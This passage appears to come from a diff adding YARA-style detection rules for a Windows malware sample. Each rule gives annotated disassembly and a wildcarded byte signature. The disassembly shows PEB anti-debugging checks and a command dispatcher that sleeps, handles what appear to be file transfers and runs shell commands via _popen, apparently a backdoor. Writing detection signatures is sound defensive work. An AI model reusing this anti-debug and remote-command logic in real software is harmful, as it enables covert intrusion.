8b45fc mov eax,dword [ebp - 4] + .text:0x00402637 c60000 mov byte [eax],0 + .text:0x0040263a 8b4dfc mov ecx,dword [ebp - 4] + .text:0x0040263d 83c101 add ecx,1 + .text:0x00402640 894dfc mov dword 
[ebp - 4],ecx + .text:0x00402643 33c0 xor eax,eax + .text:0x00402645 5f pop edi + .text:0x00402646 5e pop esi + .text:0x00402647 5b pop ebx + .text:0x00402648 8be5 mov esp,ebp + .text:0x0040264a 5d pop ebp + .text:0x0040264b c3 ret + */ + $c37 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? ?? 83 C4 04 50 E8 ?? ?? ?? ?? 83 C4 04 8B 4D ?? 89 4D ?? C7 45 ?? 00 00 00 00 EB ?? 8B 55 ?? 83 C2 01 89 55 ?? 83 7D ?? 04 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? 88 01 8B 55 ?? 83 C2 01 89 55 ?? EB ?? 8B 45 ?? C6 00 2F 8B 4D ?? 83 C1 01 89 4D ?? C7 45 ?? 00 00 00 00 EB ?? 8B 55 ?? 83 C2 01 89 55 ?? 83 7D ?? 04 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? 88 01 8B 55 ?? 83 C2 01 89 55 ?? EB ?? 8B 45 ?? C6 00 2E 8B 4D ?? 83 C1 01 89 4D ?? C7 45 ?? 00 00 00 00 EB ?? 8B 55 ?? 83 C2 01 89 55 ?? 83 7D ?? 03 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? 88 01 8B 55 ?? 83 C2 01 89 55 ?? EB ?? 8B 45 ?? C6 00 00 8B 4D ?? 83 C1 01 89 4D ?? 
33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402650@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402650 + .text:0x00402650 FUNC: int cdecl sub_00402650( int arg0, int arg1, ) [2 XREFS] + .text:0x00402650 + .text:0x00402650 Stack Variables: (offset from initial top of stack) + .text:0x00402650 8: int arg1 + .text:0x00402650 4: int arg0 + .text:0x00402650 -4100: int local4100 + .text:0x00402650 -4104: int local4104 + .text:0x00402650 -4120: int local4120 + .text:0x00402650 -4124: int local4124 + .text:0x00402650 -4128: int local4128 + .text:0x00402650 -4132: int local4132 + .text:0x00402650 -5156: int local5156 + .text:0x00402650 -5160: int local5160 + .text:0x00402650 -5164: int local5164 + .text:0x00402650 -5168: int local5168 + .text:0x00402650 -5172: int local5172 + .text:0x00402650 + .text:0x00402650 55 push ebp + .text:0x00402651 8bec mov ebp,esp + .text:0x00402653 b830140000 mov eax,0x00001430 + .text:0x00402658 e813130000 call 0x00403970 ;__alloca_probe() + .text:0x0040265d 53 push ebx + .text:0x0040265e 56 push esi + .text:0x0040265f 57 push edi + .text:0x00402660 c785e4efffff0010 mov dword [ebp - 4124],0x00001000 + .text:0x0040266a c785d4ebffff0000 mov dword [ebp - 5164],0 + .text:0x00402674 c785d0ebffff0000 mov dword [ebp - 5168],0 + .text:0x0040267e 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402684 8a5802 mov bl,byte [eax + 2] + .text:0x00402687 889dd8ebffff mov byte [ebp - 5160],bl + .text:0x0040268d 0fbe85d8ebffff movsx eax,byte [ebp - 5160] + .text:0x00402694 85c0 test eax,eax + .text:0x00402696 7405 jz 0x0040269d + .text:0x00402698 e863e9ffff call 0x00401000 ;sub_00401000() + .text:0x0040269d loc_0040269d: [1 XREFS] + .text:0x0040269d 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004026a3 8b4018 mov eax,dword [eax + 24] + .text:0x004026a6 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004026aa 8985d4ebffff mov dword [ebp - 5164],eax + .text:0x004026b0 83bdd4ebffff00 cmp 
dword [ebp - 5164],0 + .text:0x004026b7 7405 jz 0x004026be + .text:0x004026b9 e842e9ffff call 0x00401000 ;sub_00401000() + .text:0x004026be loc_004026be: [1 XREFS] + .text:0x004026be 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004026c4 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004026c8 83e870 sub eax,112 + .text:0x004026cb 8985d0ebffff mov dword [ebp - 5168],eax + .text:0x004026d1 83bdd0ebffff00 cmp dword [ebp - 5168],0 + .text:0x004026d8 7505 jnz 0x004026df + .text:0x004026da e821e9ffff call 0x00401000 ;sub_00401000() + .text:0x004026df loc_004026df: [1 XREFS] + .text:0x004026df 6800040000 push 1024 + .text:0x004026e4 8d8de0ebffff lea ecx,dword [ebp - 5152] + .text:0x004026ea 51 push ecx + .text:0x004026eb e8d0efffff call 0x004016c0 ;sub_004016c0(local5156,1024) + .text:0x004026f0 83c408 add esp,8 + .text:0x004026f3 85c0 test eax,eax + .text:0x004026f5 740a jz 0x00402701 + .text:0x004026f7 b801000000 mov eax,1 + .text:0x004026fc e975010000 jmp 0x00402876 + .text:0x00402701 loc_00402701: [1 XREFS] + .text:0x00402701 8d95dcebffff lea edx,dword [ebp - 5156] + .text:0x00402707 52 push edx + .text:0x00402708 e883f0ffff call 0x00401790 ;sub_00401790(local5160) + .text:0x0040270d 83c404 add esp,4 + .text:0x00402710 85c0 test eax,eax + .text:0x00402712 740a jz 0x0040271e + .text:0x00402714 b801000000 mov eax,1 + .text:0x00402719 e958010000 jmp 0x00402876 + .text:0x0040271e loc_0040271e: [1 XREFS] + .text:0x0040271e 6a10 push 16 + .text:0x00402720 8d85ecefffff lea eax,dword [ebp - 4116] + .text:0x00402726 50 push eax + .text:0x00402727 e8e4fdffff call 0x00402510 ;sub_00402510(local4120) + .text:0x0040272c 83c408 add esp,8 + .text:0x0040272f 85c0 test eax,eax + .text:0x00402731 740a jz 0x0040273d + .text:0x00402733 b801000000 mov eax,1 + .text:0x00402738 e939010000 jmp 0x00402876 + .text:0x0040273d loc_0040273d: [1 XREFS] + .text:0x0040273d 8d8de4efffff lea ecx,dword [ebp - 4124] + .text:0x00402743 51 push ecx + .text:0x00402744 8d9500f0ffff lea edx,dword 
[ebp - 4096] + .text:0x0040274a 52 push edx + .text:0x0040274b 8d85ecefffff lea eax,dword [ebp - 4116] + .text:0x00402751 50 push eax + .text:0x00402752 8b8ddcebffff mov ecx,dword [ebp - 5156] + .text:0x00402758 51 push ecx + .text:0x00402759 8d95e0ebffff lea edx,dword [ebp - 5152] + .text:0x0040275f 52 push edx + .text:0x00402760 e84bfaffff call 0x004021b0 ;sub_004021b0(local5156,0xfefefefe,local4120,local4100,local4128) + .text:0x00402765 83c414 add esp,20 + .text:0x00402768 85c0 test eax,eax + .text:0x0040276a 740a jz 0x00402776 + .text:0x0040276c b801000000 mov eax,1 + .text:0x00402771 e900010000 jmp 0x00402876 + .text:0x00402776 loc_00402776: [1 XREFS] + .text:0x00402776 68a8c04000 push 0x0040c0a8 + .text:0x0040277b 8d8500f0ffff lea eax,dword [ebp - 4096] + .text:0x00402781 50 push eax + .text:0x00402782 e899130000 call 0x00403b20 ;_strstr(local4100,0x0040c0a8) + .text:0x00402787 83c408 add esp,8 + .text:0x0040278a 8985fcefffff mov dword [ebp - 4100],eax + .text:0x00402790 83bdfcefffff00 cmp dword [ebp - 4100],0 + .text:0x00402797 750a jnz 0x004027a3 + .text:0x00402799 b801000000 mov eax,1 + .text:0x0040279e e9d3000000 jmp 0x00402876 + .text:0x004027a3 loc_004027a3: [1 XREFS] + .text:0x004027a3 8b8dfcefffff mov ecx,dword [ebp - 4100] + .text:0x004027a9 898de0efffff mov dword [ebp - 4128],ecx + .text:0x004027af 68a0c04000 push 0x0040c0a0 + .text:0x004027b4 8b95fcefffff mov edx,dword [ebp - 4100] + .text:0x004027ba 52 push edx + .text:0x004027bb e860130000 call 0x00403b20 ;_strstr(sub_00403b20(local4100,0x0040c0a8),0x0040c0a0) + .text:0x004027c0 83c408 add esp,8 + .text:0x004027c3 8985fcefffff mov dword [ebp - 4100],eax + .text:0x004027c9 83bdfcefffff00 cmp dword [ebp - 4100],0 + .text:0x004027d0 750a jnz 0x004027dc + .text:0x004027d2 b801000000 mov eax,1 + .text:0x004027d7 e99a000000 jmp 0x00402876 + .text:0x004027dc loc_004027dc: [1 XREFS] + .text:0x004027dc 8b85fcefffff mov eax,dword [ebp - 4100] + .text:0x004027e2 8985e8efffff mov dword [ebp - 4120],eax + 
.text:0x004027e8 8b8de8efffff mov ecx,dword [ebp - 4120] + .text:0x004027ee 2b8de0efffff sub ecx,dword [ebp - 4128] + .text:0x004027f4 83c101 add ecx,1 + .text:0x004027f7 3b4d0c cmp ecx,dword [ebp + 12] + .text:0x004027fa 7e07 jle 0x00402803 + .text:0x004027fc b801000000 mov eax,1 + .text:0x00402801 eb73 jmp 0x00402876 + .text:0x00402803 loc_00402803: [1 XREFS] + .text:0x00402803 8b95e8efffff mov edx,dword [ebp - 4120] + .text:0x00402809 2b95e0efffff sub edx,dword [ebp - 4128] + .text:0x0040280f bfa8c04000 mov edi,0x0040c0a8 + .text:0x00402814 83c9ff or ecx,0xffffffff + .text:0x00402817 33c0 xor eax,eax + .text:0x00402819 f2ae repnz: scasb + .text:0x0040281b f7d1 not ecx + .text:0x0040281d 83c1ff add ecx,0xffffffff + .text:0x00402820 2bd1 sub edx,ecx + .text:0x00402822 bfa8c04000 mov edi,0x0040c0a8 + .text:0x00402827 83c9ff or ecx,0xffffffff + .text:0x0040282a 33c0 xor eax,eax + .text:0x0040282c f2ae repnz: scasb + .text:0x0040282e f7d1 not ecx + .text:0x00402830 83c1ff add ecx,0xffffffff + .text:0x00402833 8bb5e0efffff mov esi,dword [ebp - 4128] + .text:0x00402839 03f1 add esi,ecx + .text:0x0040283b 8b7d08 mov edi,dword [ebp + 8] + .text:0x0040283e 8bca mov ecx,edx + .text:0x00402840 8bc1 mov eax,ecx + .text:0x00402842 c1e902 shr ecx,2 + .text:0x00402845 f3a5 rep: movsd + .text:0x00402847 8bc8 mov ecx,eax + .text:0x00402849 83e103 and ecx,3 + .text:0x0040284c f3a4 rep: movsb + .text:0x0040284e 8b95e8efffff mov edx,dword [ebp - 4120] + .text:0x00402854 2b95e0efffff sub edx,dword [ebp - 4128] + .text:0x0040285a bfa8c04000 mov edi,0x0040c0a8 + .text:0x0040285f 83c9ff or ecx,0xffffffff + .text:0x00402862 33c0 xor eax,eax + .text:0x00402864 f2ae repnz: scasb + .text:0x00402866 f7d1 not ecx + .text:0x00402868 83c1ff add ecx,0xffffffff + .text:0x0040286b 2bd1 sub edx,ecx + .text:0x0040286d 8b4508 mov eax,dword [ebp + 8] + .text:0x00402870 c6041000 mov byte [eax + edx],0 + .text:0x00402874 33c0 xor eax,eax + .text:0x00402876 loc_00402876: [7 XREFS] + .text:0x00402876 5f 
pop edi + .text:0x00402877 5e pop esi + .text:0x00402878 5b pop ebx + .text:0x00402879 8be5 mov esp,ebp + .text:0x0040287b 5d pop ebp + .text:0x0040287c c3 ret + */ + $c38 = { 55 8B EC B8 30 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 10 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 10 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 14 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 A8 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 68 A0 C0 40 00 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 2B 8D ?? ?? ?? ?? 83 C1 01 3B 4D ?? 7E ?? B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? BF A8 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 2B D1 BF A8 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B B5 ?? ?? ?? ?? 03 F1 8B 7D ?? 8B CA 8B C1 C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? BF A8 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 2B D1 8B 45 ?? 
C6 04 10 00 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402880@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402880 + .text:0x00402880 FUNC: int cdecl sub_00402880( int arg0, ) [2 XREFS] + .text:0x00402880 + .text:0x00402880 Stack Variables: (offset from initial top of stack) + .text:0x00402880 4: int arg0 + .text:0x00402880 -1028: int local1028 + .text:0x00402880 -1032: int local1032 + .text:0x00402880 -1036: int local1036 + .text:0x00402880 -1040: int local1040 + .text:0x00402880 -1044: int local1044 + .text:0x00402880 -1048: int local1048 + .text:0x00402880 -1052: int local1052 + .text:0x00402880 -1056: int local1056 + .text:0x00402880 -1060: int local1060 + .text:0x00402880 -1064: int local1064 + .text:0x00402880 -1068: int local1068 + .text:0x00402880 -1072: int local1072 + .text:0x00402880 -1076: int local1076 + .text:0x00402880 + .text:0x00402880 55 push ebp + .text:0x00402881 8bec mov ebp,esp + .text:0x00402883 81ec30040000 sub esp,1072 + .text:0x00402889 53 push ebx + .text:0x0040288a 56 push esi + .text:0x0040288b 57 push edi + .text:0x0040288c c785d4fbffff0000 mov dword [ebp - 1068],0 + .text:0x00402896 c785d0fbffff0000 mov dword [ebp - 1072],0 + .text:0x004028a0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028a6 8a5802 mov bl,byte [eax + 2] + .text:0x004028a9 889dd8fbffff mov byte [ebp - 1064],bl + .text:0x004028af 0fbe85d8fbffff movsx eax,byte [ebp - 1064] + .text:0x004028b6 85c0 test eax,eax + .text:0x004028b8 7405 jz 0x004028bf + .text:0x004028ba e841e7ffff call 0x00401000 ;sub_00401000() + .text:0x004028bf loc_004028bf: [1 XREFS] + .text:0x004028bf 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028c5 8b4018 mov eax,dword [eax + 24] + .text:0x004028c8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004028cc 8985d4fbffff mov dword [ebp - 1068],eax + .text:0x004028d2 83bdd4fbffff00 cmp dword [ebp - 1068],0 + .text:0x004028d9 7405 jz 0x004028e0 + .text:0x004028db e820e7ffff 
call 0x00401000 ;sub_00401000() + .text:0x004028e0 loc_004028e0: [1 XREFS] + .text:0x004028e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028e6 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004028ea 83e870 sub eax,112 + .text:0x004028ed 8985d0fbffff mov dword [ebp - 1072],eax + .text:0x004028f3 83bdd0fbffff00 cmp dword [ebp - 1072],0 + .text:0x004028fa 7505 jnz 0x00402901 + .text:0x004028fc e8ffe6ffff call 0x00401000 ;sub_00401000() + .text:0x00402901 loc_00402901: [1 XREFS] + .text:0x00402901 6800040000 push 1024 + .text:0x00402906 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x0040290c 51 push ecx + .text:0x0040290d e83efdffff call 0x00402650 ;sub_00402650(local1028,1024) + .text:0x00402912 83c408 add esp,8 + .text:0x00402915 85c0 test eax,eax + .text:0x00402917 740a jz 0x00402923 + .text:0x00402919 b801000000 mov eax,1 + .text:0x0040291e e90c030000 jmp 0x00402c2f + .text:0x00402923 loc_00402923: [1 XREFS] + .text:0x00402923 bfdcc04000 mov edi,0x0040c0dc + .text:0x00402928 83c9ff or ecx,0xffffffff + .text:0x0040292b 33c0 xor eax,eax + .text:0x0040292d f2ae repnz: scasb + .text:0x0040292f f7d1 not ecx + .text:0x00402931 83c1ff add ecx,0xffffffff + .text:0x00402934 51 push ecx + .text:0x00402935 68dcc04000 push 0x0040c0dc + .text:0x0040293a 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402940 52 push edx + .text:0x00402941 e80a180000 call 0x00404150 ;_strncmp(local1028,0x0040c0dc,0xffffffff) + .text:0x00402946 83c40c add esp,12 + .text:0x00402949 85c0 test eax,eax + .text:0x0040294b 755c jnz 0x004029a9 + .text:0x0040294d 68d8c04000 push 0x0040c0d8 + .text:0x00402952 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402958 50 push eax + .text:0x00402959 e856170000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x0040295e 83c408 add esp,8 + .text:0x00402961 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00402967 68d8c04000 push 0x0040c0d8 + .text:0x0040296c 6a00 push 0 + .text:0x0040296e e841170000 call 0x004040b4 
;_strtok(0,0x0040c0d8) + .text:0x00402973 83c408 add esp,8 + .text:0x00402976 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x0040297c 8b8df8fbffff mov ecx,dword [ebp - 1032] + .text:0x00402982 51 push ecx + .text:0x00402983 e8a2100000 call 0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402988 83c404 add esp,4 + .text:0x0040298b 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x00402991 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x00402997 69d2e8030000 imul edx,edx,1000 + .text:0x0040299d 52 push edx + .text:0x0040299e ff1538b04000 call dword [0x0040b038] ;kernel32.Sleep(0x520fba98) + .text:0x004029a4 e984020000 jmp 0x00402c2d + .text:0x004029a9 loc_004029a9: [1 XREFS] + .text:0x004029a9 bfd0c04000 mov edi,0x0040c0d0 + .text:0x004029ae 83c9ff or ecx,0xffffffff + .text:0x004029b1 33c0 xor eax,eax + .text:0x004029b3 f2ae repnz: scasb + .text:0x004029b5 f7d1 not ecx + .text:0x004029b7 83c1ff add ecx,0xffffffff + .text:0x004029ba 51 push ecx + .text:0x004029bb 68d0c04000 push 0x0040c0d0 + .text:0x004029c0 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x004029c6 50 push eax + .text:0x004029c7 e884170000 call 0x00404150 ;_strncmp(local1028,0x0040c0d0,0xffffffff) + .text:0x004029cc 83c40c add esp,12 + .text:0x004029cf 85c0 test eax,eax + .text:0x004029d1 0f8586000000 jnz 0x00402a5d + .text:0x004029d7 68d8c04000 push 0x0040c0d8 + .text:0x004029dc 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x004029e2 51 push ecx + .text:0x004029e3 e8cc160000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x004029e8 83c408 add esp,8 + .text:0x004029eb 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x004029f1 68d8c04000 push 0x0040c0d8 + .text:0x004029f6 6a00 push 0 + .text:0x004029f8 e8b7160000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x004029fd 83c408 add esp,8 + .text:0x00402a00 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00402a06 8b95f4fbffff mov edx,dword [ebp - 1036] + .text:0x00402a0c 52 push edx + .text:0x00402a0d e818100000 call 
0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402a12 83c404 add esp,4 + .text:0x00402a15 8985f0fbffff mov dword [ebp - 1040],eax + .text:0x00402a1b 68d8c04000 push 0x0040c0d8 + .text:0x00402a20 6a00 push 0 + .text:0x00402a22 e88d160000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402a27 83c408 add esp,8 + .text:0x00402a2a 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00402a30 8b85f4fbffff mov eax,dword [ebp - 1036] + .text:0x00402a36 50 push eax + .text:0x00402a37 8b8df0fbffff mov ecx,dword [ebp - 1040] + .text:0x00402a3d 51 push ecx + .text:0x00402a3e 8b5508 mov edx,dword [ebp + 8] + .text:0x00402a41 52 push edx + .text:0x00402a42 e8d9f5ffff call 0x00402020 ;sub_00402020(arg0,sub_00403a2a(<0x004029f8>),sub_004040b4(0,0x0040c0d8)) + .text:0x00402a47 83c40c add esp,12 + .text:0x00402a4a 85c0 test eax,eax + .text:0x00402a4c 740a jz 0x00402a58 + .text:0x00402a4e b801000000 mov eax,1 + .text:0x00402a53 e9d7010000 jmp 0x00402c2f + .text:0x00402a58 loc_00402a58: [1 XREFS] + .text:0x00402a58 e9d0010000 jmp 0x00402c2d + .text:0x00402a5d loc_00402a5d: [1 XREFS] + .text:0x00402a5d bfc4c04000 mov edi,0x0040c0c4 + .text:0x00402a62 83c9ff or ecx,0xffffffff + .text:0x00402a65 33c0 xor eax,eax + .text:0x00402a67 f2ae repnz: scasb + .text:0x00402a69 f7d1 not ecx + .text:0x00402a6b 83c1ff add ecx,0xffffffff + .text:0x00402a6e 51 push ecx + .text:0x00402a6f 68c4c04000 push 0x0040c0c4 + .text:0x00402a74 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402a7a 50 push eax + .text:0x00402a7b e8d0160000 call 0x00404150 ;_strncmp(local1028,0x0040c0c4,0xffffffff) + .text:0x00402a80 83c40c add esp,12 + .text:0x00402a83 85c0 test eax,eax + .text:0x00402a85 0f8586000000 jnz 0x00402b11 + .text:0x00402a8b 68d8c04000 push 0x0040c0d8 + .text:0x00402a90 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402a96 51 push ecx + .text:0x00402a97 e818160000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x00402a9c 83c408 add esp,8 + .text:0x00402a9f 8985ecfbffff mov 
dword [ebp - 1044],eax + .text:0x00402aa5 68d8c04000 push 0x0040c0d8 + .text:0x00402aaa 6a00 push 0 + .text:0x00402aac e803160000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402ab1 83c408 add esp,8 + .text:0x00402ab4 8985ecfbffff mov dword [ebp - 1044],eax + .text:0x00402aba 8b95ecfbffff mov edx,dword [ebp - 1044] + .text:0x00402ac0 52 push edx + .text:0x00402ac1 e8640f0000 call 0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402ac6 83c404 add esp,4 + .text:0x00402ac9 8985e8fbffff mov dword [ebp - 1048],eax + .text:0x00402acf 68d8c04000 push 0x0040c0d8 + .text:0x00402ad4 6a00 push 0 + .text:0x00402ad6 e8d9150000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402adb 83c408 add esp,8 + .text:0x00402ade 8985ecfbffff mov dword [ebp - 1044],eax + .text:0x00402ae4 8b85ecfbffff mov eax,dword [ebp - 1044] + .text:0x00402aea 50 push eax + .text:0x00402aeb 8b8de8fbffff mov ecx,dword [ebp - 1048] + .text:0x00402af1 51 push ecx + .text:0x00402af2 8b5508 mov edx,dword [ebp + 8] + .text:0x00402af5 52 push edx + .text:0x00402af6 e835f3ffff call 0x00401e30 ;sub_00401e30(arg0,sub_00403a2a(<0x00402aac>),sub_004040b4(0,0x0040c0d8)) + .text:0x00402afb 83c40c add esp,12 + .text:0x00402afe 85c0 test eax,eax + .text:0x00402b00 740a jz 0x00402b0c + .text:0x00402b02 b801000000 mov eax,1 + .text:0x00402b07 e923010000 jmp 0x00402c2f + .text:0x00402b0c loc_00402b0c: [1 XREFS] + .text:0x00402b0c e91c010000 jmp 0x00402c2d + .text:0x00402b11 loc_00402b11: [1 XREFS] + .text:0x00402b11 bfc0c04000 mov edi,0x0040c0c0 + .text:0x00402b16 83c9ff or ecx,0xffffffff + .text:0x00402b19 33c0 xor eax,eax + .text:0x00402b1b f2ae repnz: scasb + .text:0x00402b1d f7d1 not ecx + .text:0x00402b1f 83c1ff add ecx,0xffffffff + .text:0x00402b22 51 push ecx + .text:0x00402b23 68c0c04000 push 0x0040c0c0 + .text:0x00402b28 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402b2e 50 push eax + .text:0x00402b2f e81c160000 call 0x00404150 ;_strncmp(local1028,0x0040c0c0,0xffffffff) + .text:0x00402b34 
83c40c add esp,12 + .text:0x00402b37 85c0 test eax,eax + .text:0x00402b39 0f85c8000000 jnz 0x00402c07 + .text:0x00402b3f 68d8c04000 push 0x0040c0d8 + .text:0x00402b44 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402b4a 51 push ecx + .text:0x00402b4b e864150000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x00402b50 83c408 add esp,8 + .text:0x00402b53 8985e4fbffff mov dword [ebp - 1052],eax + .text:0x00402b59 68d8c04000 push 0x0040c0d8 + .text:0x00402b5e 6a00 push 0 + .text:0x00402b60 e84f150000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402b65 83c408 add esp,8 + .text:0x00402b68 8985e4fbffff mov dword [ebp - 1052],eax + .text:0x00402b6e 8b95e4fbffff mov edx,dword [ebp - 1052] + .text:0x00402b74 52 push edx + .text:0x00402b75 e8b00e0000 call 0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402b7a 83c404 add esp,4 + .text:0x00402b7d 8985dcfbffff mov dword [ebp - 1060],eax + .text:0x00402b83 68bcc04000 push 0x0040c0bc + .text:0x00402b88 6a00 push 0 + .text:0x00402b8a e825150000 call 0x004040b4 ;_strtok(0,0x0040c0bc) + .text:0x00402b8f 83c408 add esp,8 + .text:0x00402b92 8985e4fbffff mov dword [ebp - 1052],eax + .text:0x00402b98 68b8c04000 push 0x0040c0b8 + .text:0x00402b9d 8b85e4fbffff mov eax,dword [ebp - 1052] + .text:0x00402ba3 50 push eax + .text:0x00402ba4 e8fb100000 call 0x00403ca4 ;__popen(sub_004040b4(0,0x0040c0bc),<0x00402b60>,local1028,<0x00402b8a>) + .text:0x00402ba9 83c408 add esp,8 + .text:0x00402bac 8985e0fbffff mov dword [ebp - 1056],eax + .text:0x00402bb2 83bde0fbffff00 cmp dword [ebp - 1056],0 + .text:0x00402bb9 7507 jnz 0x00402bc2 + .text:0x00402bbb b801000000 mov eax,1 + .text:0x00402bc0 eb6d jmp 0x00402c2f + .text:0x00402bc2 loc_00402bc2: [1 XREFS] + .text:0x00402bc2 8b8de0fbffff mov ecx,dword [ebp - 1056] + .text:0x00402bc8 51 push ecx + .text:0x00402bc9 8b95dcfbffff mov edx,dword [ebp - 1060] + .text:0x00402bcf 52 push edx + .text:0x00402bd0 8b4508 mov eax,dword [ebp + 8] + .text:0x00402bd3 50 push eax + 
.text:0x00402bd4 e8f7f0ffff call 0x00401cd0 ;sub_00401cd0(arg0,sub_00403a2a(<0x00402b60>),sub_00403ca4(<0x00402b8a>,<0x00402b60>,local1028,<0x00402b8a>)) + .text:0x00402bd9 83c40c add esp,12 + .text:0x00402bdc 85c0 test eax,eax + .text:0x00402bde 7416 jz 0x00402bf6 + .text:0x00402be0 8b8de0fbffff mov ecx,dword [ebp - 1056] + .text:0x00402be6 51 push ecx + .text:0x00402be7 e817140000 call 0x00404003 ;__pclose(<0x00402ba4>) + .text:0x00402bec 83c404 add esp,4 + .text:0x00402bef b801000000 mov eax,1 + .text:0x00402bf4 eb39 jmp 0x00402c2f + .text:0x00402bf6 loc_00402bf6: [1 XREFS] + .text:0x00402bf6 8b95e0fbffff mov edx,dword [ebp - 1056] + .text:0x00402bfc 52 push edx + .text:0x00402bfd e801140000 call 0x00404003 ;__pclose(<0x00402ba4>) + .text:0x00402c02 83c404 add esp,4 + .text:0x00402c05 eb26 jmp 0x00402c2d + .text:0x00402c07 loc_00402c07: [1 XREFS] + .text:0x00402c07 bfb0c04000 mov edi,0x0040c0b0 + .text:0x00402c0c 83c9ff or ecx,0xffffffff + .text:0x00402c0f 33c0 xor eax,eax 